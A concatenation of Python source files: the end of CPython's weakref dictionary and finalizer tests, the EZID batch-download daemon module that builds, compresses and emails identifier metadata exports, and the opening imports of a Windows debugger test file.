def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(list(d.keys()), [o2])
def test_weak_keyed_union_operators(self):
o1 = C()
o2 = C()
o3 = C()
wkd1 = weakref.WeakKeyDictionary({o1: 1, o2: 2})
wkd2 = weakref.WeakKeyDictionary({o3: 3, o1: 4})
wkd3 = wkd1.copy()
d1 = {o2: '5', o3: '6'}
pairs = [(o2, 7), (o3, 8)]
tmp1 = wkd1 | wkd2 # Between two WeakKeyDictionaries
self.assertEqual(dict(tmp1), dict(wkd1) | dict(wkd2))
self.assertIs(type(tmp1), weakref.WeakKeyDictionary)
wkd1 |= wkd2
self.assertEqual(wkd1, tmp1)
tmp2 = wkd2 | d1 # Between WeakKeyDictionary and mapping
self.assertEqual(dict(tmp2), dict(wkd2) | d1)
self.assertIs(type(tmp2), weakref.WeakKeyDictionary)
wkd2 |= d1
self.assertEqual(wkd2, tmp2)
tmp3 = wkd3.copy() # Between WeakKeyDictionary and iterable key, value
tmp3 |= pairs
self.assertEqual(dict(tmp3), dict(wkd3) | dict(pairs))
self.assertIs(type(tmp3), weakref.WeakKeyDictionary)
tmp4 = d1 | wkd3 # Testing .__ror__
self.assertEqual(dict(tmp4), d1 | dict(wkd3))
self.assertIs(type(tmp4), weakref.WeakKeyDictionary)
del o1
gc_collect() # For PyPy or other GCs.
self.assertNotIn(4, tmp1.values())
self.assertNotIn(4, tmp2.values())
self.assertNotIn(1, tmp3.values())
self.assertNotIn(1, tmp4.values())
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(list(d.items()), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = list(d.keys())
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time through the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
gc_collect() # For PyPy or other GCs.
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_make_weak_valued_dict_repr(self):
dict = weakref.WeakValueDictionary()
self.assertRegex(repr(dict), '<WeakValueDictionary at 0x.*>')
def test_make_weak_keyed_dict_repr(self):
dict = weakref.WeakKeyDictionary()
self.assertRegex(repr(dict), '<WeakKeyDictionary at 0x.*>')
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(100000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
def check_threaded_weak_dict_copy(self, type_, deepcopy):
# `type_` should be either WeakKeyDictionary or WeakValueDictionary.
# `deepcopy` should be either True or False.
exc = []
class DummyKey:
def __init__(self, ctr):
self.ctr = ctr
class DummyValue:
def __init__(self, ctr):
self.ctr = ctr
def dict_copy(d, exc):
try:
if deepcopy is True:
_ = copy.deepcopy(d)
else:
_ = d.copy()
except Exception as ex:
exc.append(ex)
def pop_and_collect(lst):
gc_ctr = 0
while lst:
i = random.randint(0, len(lst) - 1)
gc_ctr += 1
lst.pop(i)
if gc_ctr % 10000 == 0:
gc.collect() # just in case
self.assertIn(type_, (weakref.WeakKeyDictionary, weakref.WeakValueDictionary))
d = type_()
keys = []
values = []
# Initialize d with many entries
for i in range(70000):
k, v = DummyKey(i), DummyValue(i)
keys.append(k)
values.append(v)
d[k] = v
del k
del v
t_copy = threading.Thread(target=dict_copy, args=(d, exc,))
if type_ is weakref.WeakKeyDictionary:
t_collect = threading.Thread(target=pop_and_collect, args=(keys,))
else: # weakref.WeakValueDictionary
t_collect = threading.Thread(target=pop_and_collect, args=(values,))
t_copy.start()
t_collect.start()
t_copy.join()
t_collect.join()
# Test exceptions
if exc:
raise exc[0]
def test_threaded_weak_key_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, False)
def test_threaded_weak_key_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakKeyDictionary, True)
def test_threaded_weak_value_dict_copy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, False)
def test_threaded_weak_value_dict_deepcopy(self):
# Issue #35615: Weakref keys or values getting GC'ed during dict
# copying should not result in a crash.
self.check_threaded_weak_dict_copy(weakref.WeakValueDictionary, True)
@support.cpython_only
def test_remove_closure(self):
d = weakref.WeakValueDictionary()
self.assertIsNone(d._remove.__closure__)
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
class FinalizeTestCase(unittest.TestCase):
class A:
pass
def _collect_if_necessary(self):
# we create no ref-cycles so in CPython no gc should be needed
if sys.implementation.name != 'cpython':
support.gc_collect()
def test_finalize(self):
def add(x,y,z):
res.append(x + y + z)
return x + y + z
a = self.A()
res = []
f = weakref.finalize(a, add, 67, 43, z=89)
self.assertEqual(f.alive, True)
self.assertEqual(f.peek(), (a, add, (67,43), {'z':89}))
self.assertEqual(f(), 199)
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
res = []
f = weakref.finalize(a, add, 67, 43, 89)
self.assertEqual(f.peek(), (a, add, (67,43,89), {}))
self.assertEqual(f.detach(), (a, add, (67,43,89), {}))
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [])
res = []
f = weakref.finalize(a, add, x=67, y=43, z=89)
del a
self._collect_if_necessary()
self.assertEqual(f(), None)
self.assertEqual(f(), None)
self.assertEqual(f.peek(), None)
self.assertEqual(f.detach(), None)
self.assertEqual(f.alive, False)
self.assertEqual(res, [199])
def test_arg_errors(self):
def fin(*args, **kwargs):
res.append((args, kwargs))
a = self.A()
res = []
f = weakref.finalize(a, fin, 1, 2, func=3, obj=4)
self.assertEqual(f.peek(), (a, fin, (1, 2), {'func': 3, 'obj': 4}))
f()
self.assertEqual(res, [((1, 2), {'func': 3, 'obj': 4})])
with self.assertRaises(TypeError):
weakref.finalize(a, func=fin, arg=1)
with self.assertRaises(TypeError):
weakref.finalize(obj=a, func=fin, arg=1)
self.assertRaises(TypeError, weakref.finalize, a)
self.assertRaises(TypeError, weakref.finalize)
def test_order(self):
a = self.A()
res = []
f1 = weakref.finalize(a, res.append, 'f1')
f2 = weakref.finalize(a, res.append, 'f2')
f3 = weakref.finalize(a, res.append, 'f3')
f4 = weakref.finalize(a, res.append, 'f4')
f5 = weakref.finalize(a, res.append, 'f5')
# make sure finalizers can keep themselves alive
del f1, f4
self.assertTrue(f2.alive)
self.assertTrue(f3.alive)
self.assertTrue(f5.alive)
self.assertTrue(f5.detach())
self.assertFalse(f5.alive)
f5() # nothing because previously unregistered
res.append('A')
f3() # => res.append('f3')
self.assertFalse(f3.alive)
res.append('B')
f3() # nothing because previously called
res.append('C')
del a
self._collect_if_necessary()
# => res.append('f4')
# => res.append('f2')
# => res.append('f1')
self.assertFalse(f2.alive)
res.append('D')
f2() # nothing because previously called by gc
expected = ['A', 'f3', 'B', 'C', 'f4', 'f2', 'f1', 'D']
self.assertEqual(res, expected)
def test_all_freed(self):
# we want a weakrefable subclass of weakref.finalize
class MyFinalizer(weakref.finalize):
pass
a = self.A()
res = []
def callback():
res.append(123)
f = MyFinalizer(a, callback)
wr_callback = weakref.ref(callback)
wr_f = weakref.ref(f)
del callback, f
self.assertIsNotNone(wr_callback())
self.assertIsNotNone(wr_f())
del a
self._collect_if_necessary()
self.assertIsNone(wr_callback())
self.assertIsNone(wr_f())
self.assertEqual(res, [123])
@classmethod
def run_in_child(cls):
def error():
# Create an atexit finalizer from inside a finalizer called
# at exit. This should be the next to be run.
g1 = weakref.finalize(cls, print, 'g1')
print('f3 error')
1/0
# cls should stay alive till atexit callbacks run
f1 = weakref.finalize(cls, print, 'f1', _global_var)
f2 = weakref.finalize(cls, print, 'f2', _global_var)
f3 = weakref.finalize(cls, error)
f4 = weakref.finalize(cls, print, 'f4', _global_var)
assert f1.atexit == True
f2.atexit = False
assert f3.atexit == True
assert f4.atexit == True
def test_atexit(self):
prog = ('from test.test_weakref import FinalizeTestCase;'+
'FinalizeTestCase.run_in_child()')
rc, out, err = script_helper.assert_python_ok('-c', prog)
out = out.decode('ascii').splitlines()
self.assertEqual(out, ['f4 foobar', 'f3 error', 'g1', 'f1 foobar'])
self.assertTrue(b'ZeroDivisionError' in err)
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> from test.support import gc_collect
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print(r() is obj)
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> gc_collect() # For PyPy or other GCs.
>>> print(r())
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super().__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.items():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super().__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> gc_collect() # For PyPy or other GCs.
>>> try:
... id2obj(a_id)
... except KeyError:
... print('OK')
... else:
... print('WeakValueDictionary error')
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
support.run_unittest(
ReferencesTestCase,
WeakMethodTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
FinalizeTestCase,
)
support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
download.py
|
# =============================================================================
#
# EZID :: download.py
#
# Batch download.
#
# Downloads are created by a single daemon thread. The download
# creation process is designed to be restartable at any point: if the
# server is restarted, the current download resumes where it left off.
#
# When the server is reloaded, a new daemon thread gets created. Race
# conditions exist between the old and new threads while the old
# thread still exists, but actual conflicts should be very unlikely.
#
# Author:
# Greg Janee <gjanee@ucop.edu>
#
# License:
# Copyright (c) 2015, Regents of the University of California
# http://creativecommons.org/licenses/BSD/
#
# -----------------------------------------------------------------------------
import csv
import django.conf
import django.core.mail
import hashlib
import os
import os.path
import re
import subprocess
import threading
import time
import uuid
import anvl
import config
import ezidapp.models
import log
import policy
import util
import util2
_ezidUrl = None
_usedFilenames = None
_lock = threading.Lock()
_daemonEnabled = None
_threadName = None
_idleSleep = None
_gzipCommand = None
_zipCommand = None
def loadConfig ():
global _ezidUrl, _usedFilenames, _daemonEnabled, _threadName, _idleSleep
global _gzipCommand, _zipCommand
_ezidUrl = config.get("DEFAULT.ezid_base_url")
_lock.acquire()
try:
if _usedFilenames == None:
_usedFilenames = [r.filename for r in\
ezidapp.models.DownloadQueue.objects.all()] +\
[f.split(".")[0] for f in\
os.listdir(django.conf.settings.DOWNLOAD_PUBLIC_DIR)]
finally:
_lock.release()
_idleSleep = int(config.get("daemons.download_processing_idle_sleep"))
_gzipCommand = config.get("DEFAULT.gzip_command")
_zipCommand = config.get("DEFAULT.zip_command")
_daemonEnabled = (django.conf.settings.DAEMON_THREADS_ENABLED and\
config.get("daemons.download_enabled").lower() == "true")
if _daemonEnabled:
_threadName = uuid.uuid1().hex
t = threading.Thread(target=_daemonThread, name=_threadName)
t.setDaemon(True)
t.start()
_formatCode = {
"anvl": ezidapp.models.DownloadQueue.ANVL,
"csv": ezidapp.models.DownloadQueue.CSV,
"xml": ezidapp.models.DownloadQueue.XML
}
_formatSuffix = {
ezidapp.models.DownloadQueue.ANVL: "txt",
ezidapp.models.DownloadQueue.CSV: "csv",
ezidapp.models.DownloadQueue.XML: "xml"
}
_compressionCode = {
"gzip": ezidapp.models.DownloadQueue.GZIP,
"zip": ezidapp.models.DownloadQueue.ZIP
}
class _ValidationException (Exception):
pass
def _validateString (v):
s = v.strip()
if s == "": raise _ValidationException("empty value")
return s
def _validateEnumerated (v, l):
if v not in l: raise _ValidationException("invalid parameter value")
return v
def _validateBoolean (v):
return (_validateEnumerated(v, ["yes", "no"]) == "yes")
def _validateTimestamp (v):
try:
try:
return util.parseTimestampZulu(v)
except:
return int(v)
except:
raise _ValidationException("invalid timestamp")
def _validateUser (v):
u = ezidapp.models.getUserByUsername(v)
if u != None and not u.isAnonymous:
return u
else:
raise _ValidationException("no such user")
def _validateGroup (v):
g = ezidapp.models.getGroupByGroupname(v)
if g != None and not g.isAnonymous:
return g
else:
raise _ValidationException("no such group")
# A simple encoding mechanism for storing Python objects as strings
# follows. We could use pickling, but this technique makes debugging
# a little easier.
def _escape (s):
return re.sub("[%,=]", lambda c: "%%%02X" % ord(c.group(0)), s)
def _encode (o):
if type(o) is bool:
return "B" + str(o)
elif type(o) is int:
return "I" + str(o)
elif type(o) in [str, unicode]:
return "S" + o
elif type(o) is list:
return "L" + ",".join(map(lambda i: _escape(_encode(i)), o))
elif type(o) is dict:
return "D" + ",".join(map(lambda kv: "%s=%s" % (_escape(_encode(kv[0])),
_escape(_encode(kv[1]))), o.items()))
else:
assert False, "unhandled case"
def _unescape (s):
return re.sub("%([0-9A-F][0-9A-F])", lambda m: chr(int(m.group(1), 16)), s)
def _decode (s):
if s[0] == "B":
return (s[1:] == "True")
elif s[0] == "I":
return int(s[1:])
elif s[0] == "S":
return s[1:]
elif s[0] == "L":
if len(s) > 1:
return map(lambda i: _decode(_unescape(i)), s[1:].split(","))
else:
return []
elif s[0] == "D":
if len(s) > 1:
return dict(map(lambda i: tuple(map(lambda kv: _decode(_unescape(kv)),
i.split("="))), s[1:].split(",")))
else:
return {}
else:
assert False, "unhandled case"
_parameters = {
# name: (repeatable, validator)
"column": (True, _validateString),
"convertTimestamps": (False, _validateBoolean),
"createdAfter": (False, _validateTimestamp),
"createdBefore": (False, _validateTimestamp),
"crossref": (False, _validateBoolean),
"datacite": (False, _validateBoolean),
"exported": (False, _validateBoolean),
"format": (False, lambda v: _validateEnumerated(v, ["anvl", "csv", "xml"])),
"compression": (False, lambda v: _validateEnumerated(v, ["gzip", "zip"])),
"notify": (True, _validateString),
"owner": (True, _validateUser),
"ownergroup": (True, _validateGroup),
"permanence": (False, lambda v: _validateEnumerated(v, ["test", "real"])),
"profile": (True, _validateString),
"status": (True, lambda v: _validateEnumerated(v, ["reserved", "public",
"unavailable"])),
"type": (True, lambda v: _validateEnumerated(v, ["ark", "doi", "uuid"])),
"updatedAfter": (False, _validateTimestamp),
"updatedBefore": (False, _validateTimestamp)
}
def _generateFilename (requestor):
while True:
f = hashlib.sha1("%s,%s,%s" % (requestor, str(time.time()),
django.conf.settings.SECRET_KEY)).hexdigest()[::4]
_lock.acquire()
try:
if f not in _usedFilenames:
_usedFilenames.append(f)
return f
finally:
_lock.release()
def enqueueRequest (user, request):
"""
Enqueues a batch download request. The request must be
authenticated; 'user' should be a StoreUser object. 'request'
should be a django.http.QueryDict object (from a POST request or
manually created) containing the parameters of the request. The
available parameters are described in the API documentation. One
feature not mentioned in the documentation: for the 'notify'
parameter, an email address may be a straight address
("fred@slate.com") or may include an addressee name ("Fred
Flintstone <fred@slate.com>"); in the latter case a salutation line
will be added to the email message.
The successful return is a string that includes the download URL, as
in:
success: https://ezid.cdlib.org/download/da543b91a0.xml.gz
Unsuccessful returns include the strings:
error: forbidden
error: bad request - subreason...
error: internal server error
"""
def error (s):
return "error: bad request - " + s
try:
d = {}
for k in request:
if k not in _parameters:
return error("invalid parameter: " + util.oneLine(k))
try:
if _parameters[k][0]:
d[k] = map(_parameters[k][1], request.getlist(k))
else:
if len(request.getlist(k)) > 1:
return error("parameter is not repeatable: " + k)
d[k] = _parameters[k][1](request[k])
except _ValidationException, e:
return error("parameter '%s': %s" % (k, str(e)))
if "format" not in d:
return error("missing required parameter: format")
format = d["format"]
del d["format"]
if "compression" in d:
compression = d["compression"]
del d["compression"]
else:
compression = "gzip"
if format == "csv":
if "column" not in d:
return error("format 'csv' requires at least one column")
columns = d["column"]
del d["column"]
else:
if "column" in d:
return error("parameter is incompatible with format: column")
columns = []
toHarvest = []
if "owner" in d:
for o in d["owner"]:
if not policy.authorizeDownload(user, owner=o):
return "error: forbidden"
if o.pid not in toHarvest: toHarvest.append(o.pid)
del d["owner"]
if "ownergroup" in d:
for g in d["ownergroup"]:
if not policy.authorizeDownload(user, ownergroup=g):
return "error: forbidden"
for u in g.users.all():
if u.pid not in toHarvest: toHarvest.append(u.pid)
del d["ownergroup"]
if len(toHarvest) == 0: toHarvest = [user.pid]
if "notify" in d:
notify = d["notify"]
del d["notify"]
else:
notify = []
if "convertTimestamps" in d:
options = { "convertTimestamps": d["convertTimestamps"] }
del d["convertTimestamps"]
else:
options = { "convertTimestamps": False }
requestor = user.pid
filename = _generateFilename(requestor)
r = ezidapp.models.DownloadQueue(requestTime=int(time.time()),
rawRequest=request.urlencode(),
requestor=requestor, format=_formatCode[format],
compression=_compressionCode[compression],
columns=_encode(columns), constraints=_encode(d),
options=_encode(options), notify=_encode(notify), filename=filename,
toHarvest=",".join(toHarvest))
r.save()
return "success: %s/download/%s.%s" % (_ezidUrl, filename,
_fileSuffix(r))
except Exception, e:
log.otherError("download.enqueueRequest", e)
return "error: internal server error"
def getQueueLength ():
"""
Returns the length of the batch download queue.
"""
return ezidapp.models.DownloadQueue.objects.count()
class _AbortException (Exception):
pass
def _checkAbort ():
# This function provides a handy way to abort processing if the
# daemon is disabled or if a new daemon thread is started by a
# configuration reload. It doesn't entirely eliminate potential
# race conditions between two daemon threads, but it should make
# conflicts very unlikely.
if not _daemonEnabled or threading.currentThread().getName() != _threadName:
raise _AbortException()
def _wrapException (context, exception):
m = str(exception)
if len(m) > 0: m = ": " + m
return Exception("batch download error: %s: %s%s" % (context,
type(exception).__name__, m))
def _fileSuffix (r):
if r.compression == ezidapp.models.DownloadQueue.GZIP:
return _formatSuffix[r.format] + ".gz"
else:
return "zip"
def _path (r, i):
# i=1: uncompressed work file
# i=2: compressed work file
# i=3: compressed delivery file
# i=4: request sidecar file
if i in [1, 2]:
d = django.conf.settings.DOWNLOAD_WORK_DIR
else:
d = django.conf.settings.DOWNLOAD_PUBLIC_DIR
if i == 1:
s = _formatSuffix[r.format]
elif i in [2, 3]:
s = _fileSuffix(r)
else:
s = "request"
return os.path.join(d, "%s.%s" % (r.filename, s))
def _csvEncode (s):
return util.oneLine(s).encode("UTF-8")
def _flushFile (f):
f.flush()
os.fsync(f.fileno())
def _createFile (r):
f = None
try:
f = open(_path(r, 1), "wb")
if r.format == ezidapp.models.DownloadQueue.CSV:
w = csv.writer(f)
w.writerow([_csvEncode(c) for c in _decode(r.columns)])
_flushFile(f)
elif r.format == ezidapp.models.DownloadQueue.XML:
f.write("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<records>")
_flushFile(f)
# We don't know exactly what the CSV writer wrote, so we must
# probe the file to find its size.
n = f.tell()
except Exception, e:
raise _wrapException("error creating file", e)
else:
r.stage = ezidapp.models.DownloadQueue.HARVEST
r.fileSize = n
r.save()
finally:
if f: f.close()
def _satisfiesConstraints (id, constraints):
for k, v in constraints.items():
if k == "createdAfter":
if id.createTime < v: return False
elif k == "createdBefore":
if id.createTime >= v: return False
elif k == "crossref":
if id.isCrossref^v: return False
elif k == "datacite":
if id.isDatacite^v: return False
elif k == "exported":
if id.exported^v: return False
elif k == "permanence":
if id.isTest^(v == "test"): return False
elif k == "profile":
if id.profile.label not in v: return False
elif k == "status":
if id.get_status_display() not in v: return False
elif k == "type":
if id.type not in v: return False
elif k == "updatedAfter":
if id.updateTime < v: return False
elif k == "updatedBefore":
if id.updateTime >= v: return False
else:
assert False, "unhandled case"
return True
def _prepareMetadata (id, convertTimestamps):
d = id.toLegacy()
util2.convertLegacyToExternal(d)
if id.isDoi: d["_shadowedby"] = id.arkAlias
if convertTimestamps:
d["_created"] = util.formatTimestampZulu(int(d["_created"]))
d["_updated"] = util.formatTimestampZulu(int(d["_updated"]))
return d
def _writeAnvl (f, id, metadata):
if f.tell() > 0: f.write("\n")
f.write(":: %s\n" % id.identifier)
f.write(anvl.format(metadata).encode("UTF-8"))
def _writeCsv (f, columns, id, metadata):
w = csv.writer(f)
l = []
for c in columns:
if c == "_id":
l.append(id.identifier)
elif c == "_mappedCreator":
l.append(id.resourceCreator)
elif c == "_mappedTitle":
l.append(id.resourceTitle)
elif c == "_mappedPublisher":
l.append(id.resourcePublisher)
elif c == "_mappedDate":
l.append(id.resourcePublicationDate)
elif c == "_mappedType":
l.append(id.resourceType)
else:
l.append(metadata.get(c, ""))
w.writerow([_csvEncode(c) for c in l])
def _writeXml (f, id, metadata):
f.write("<record identifier=\"%s\">" % util.xmlEscape(id.identifier))
for k, v in metadata.items():
if k in ["datacite", "crossref"]:
v = util.removeXmlDeclaration(v)
else:
v = util.xmlEscape(v)
f.write(("<element name=\"%s\">%s</element>" %\
(util.xmlEscape(k), v)).encode("UTF-8"))
f.write("</record>")
def _harvest1 (r, f):
columns = _decode(r.columns)
constraints = _decode(r.constraints)
options = _decode(r.options)
while True:
_checkAbort()
qs = ezidapp.models.SearchIdentifier.objects.filter(
identifier__gt=r.lastId)\
.filter(owner__pid=r.toHarvest.split(",")[r.currentIndex])\
.select_related("owner", "ownergroup", "datacenter", "profile")\
.order_by("identifier")
ids = list(qs[:1000])
if len(ids) == 0: break
try:
for id in ids:
_checkAbort()
if _satisfiesConstraints(id, constraints):
m = _prepareMetadata(id, options["convertTimestamps"])
if r.format == ezidapp.models.DownloadQueue.ANVL:
_writeAnvl(f, id, m)
elif r.format == ezidapp.models.DownloadQueue.CSV:
_writeCsv(f, columns, id, m)
elif r.format == ezidapp.models.DownloadQueue.XML:
_writeXml(f, id, m)
else:
assert False, "unhandled case"
_checkAbort()
_flushFile(f)
except _AbortException:
raise
except Exception, e:
raise _wrapException("error writing file", e)
r.lastId = ids[-1].identifier
r.fileSize = f.tell()
r.save()
def _harvest (r):
f = None
try:
try:
assert os.path.getsize(_path(r, 1)) >= r.fileSize, "file is short"
f = open(_path(r, 1), "r+b")
f.seek(r.fileSize)
f.truncate()
except Exception, e:
raise _wrapException("error re-opening/seeking/truncating file", e)
start = r.currentIndex
for i in range(r.currentIndex, len(r.toHarvest.split(","))):
_checkAbort()
if i > start:
r.currentIndex = i
r.lastId = ""
r.save()
_harvest1(r, f)
_checkAbort()
if r.format == ezidapp.models.DownloadQueue.XML:
try:
f.write("</records>")
_flushFile(f)
except Exception, e:
raise _wrapException("error writing file footer", e)
r.stage = ezidapp.models.DownloadQueue.COMPRESS
r.save()
finally:
if f: f.close()
def _compressFile (r):
infile = None
outfile = None
try:
# The compression command may be long-lived, and a new daemon
# thread may be created by a server restart or reload while it is
# still running, in which case we don't try to kill the old
# process, but simply delete its output file and let it die a
# natural death.
if os.path.exists(_path(r, 2)): os.unlink(_path(r, 2))
if r.compression == ezidapp.models.DownloadQueue.GZIP:
infile = open(_path(r, 1))
outfile = open(_path(r, 2), "w")
p = subprocess.Popen([_gzipCommand], stdin=infile, stdout=outfile,
stderr=subprocess.PIPE, close_fds=True, env={})
stderr = p.communicate()[1]
else:
p = subprocess.Popen([_zipCommand, "-jq", _path(r, 2), _path(r, 1)],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, close_fds=True, env={})
stderr = p.communicate()[0]
_checkAbort()
assert p.returncode == 0 and stderr == "",\
"compression command returned status code %d, stderr '%s'" %\
(p.returncode, stderr)
except _AbortException:
raise
except Exception, e:
raise _wrapException("error compressing file", e)
else:
r.stage = ezidapp.models.DownloadQueue.DELETE
r.save()
finally:
if infile: infile.close()
if outfile: outfile.close()
def _deleteUncompressedFile (r):
try:
if os.path.exists(_path(r, 1)): os.unlink(_path(r, 1))
except Exception, e:
raise _wrapException("error deleting uncompressed file", e)
else:
r.stage = ezidapp.models.DownloadQueue.MOVE
r.save()
def _moveCompressedFile (r):
try:
if os.path.exists(_path(r, 2)):
os.rename(_path(r, 2), _path(r, 3))
else:
assert os.path.exists(_path(r, 3)), "file has disappeared"
except Exception, e:
raise _wrapException("error moving compressed file", e)
else:
r.stage = ezidapp.models.DownloadQueue.NOTIFY
r.save()
def _notifyRequestor (r):
f = None
try:
f = open(_path(r, 4), "w")
f.write("%s\n%s\n" % (ezidapp.models.getUserByPid(r.requestor).username,
r.rawRequest.encode("UTF-8")))
except Exception, e:
raise _wrapException("error writing sidecar file", e)
finally:
if f: f.close()
for emailAddress in _decode(r.notify):
m = re.match("(.*)<([^>]*)>$", emailAddress)
if m and m.group(1).strip() != "" and m.group(2).strip() != "":
salutation = "Dear %s,\n\n" % m.group(1).strip()
emailAddress = m.group(2).strip()
else:
salutation = ""
message = ("%sThank you for using ARKetype to easily create and manage " +\
"your identifiers. The batch download you requested is available " +\
"at:\n\n" +\
"%s/download/%s.%s\n\n" +\
"The download will be deleted in 1 week.\n\n" +\
"Best,\n" +\
"ARKetype Team\n\n" +\
"This is an automated email. Please do not reply.\n") %\
(salutation, _ezidUrl, r.filename, _fileSuffix(r))
try:
django.core.mail.send_mail("Your EZID batch download link", message,
django.conf.settings.SERVER_EMAIL, [emailAddress], fail_silently=True)
except Exception, e:
raise _wrapException("error sending email", e)
r.delete()
def _daemonThread ():
doSleep = True
while True:
if doSleep:
django.db.connections["default"].close()
django.db.connections["search"].close()
time.sleep(_idleSleep)
try:
_checkAbort()
r = ezidapp.models.DownloadQueue.objects.all().order_by("seq")[:1]
if len(r) == 0:
doSleep = True
continue
r = r[0]
_checkAbort()
if r.stage == ezidapp.models.DownloadQueue.CREATE:
_createFile(r)
elif r.stage == ezidapp.models.DownloadQueue.HARVEST:
_harvest(r)
elif r.stage == ezidapp.models.DownloadQueue.COMPRESS:
_compressFile(r)
elif r.stage == ezidapp.models.DownloadQueue.DELETE:
_deleteUncompressedFile(r)
elif r.stage == ezidapp.models.DownloadQueue.MOVE:
_moveCompressedFile(r)
elif r.stage == ezidapp.models.DownloadQueue.NOTIFY:
_notifyRequestor(r)
else:
assert False, "unhandled case"
doSleep = False
except _AbortException:
break
except Exception, e:
log.otherError("download._daemonThread", e)
doSleep = True
|
test_debugger.py
|
import pytest
import textwrap
import ctypes
import os
import windows
import windows.generated_def as gdef
import windows.native_exec.simple_x86 as x86
import windows.native_exec.simple_x64 as x64
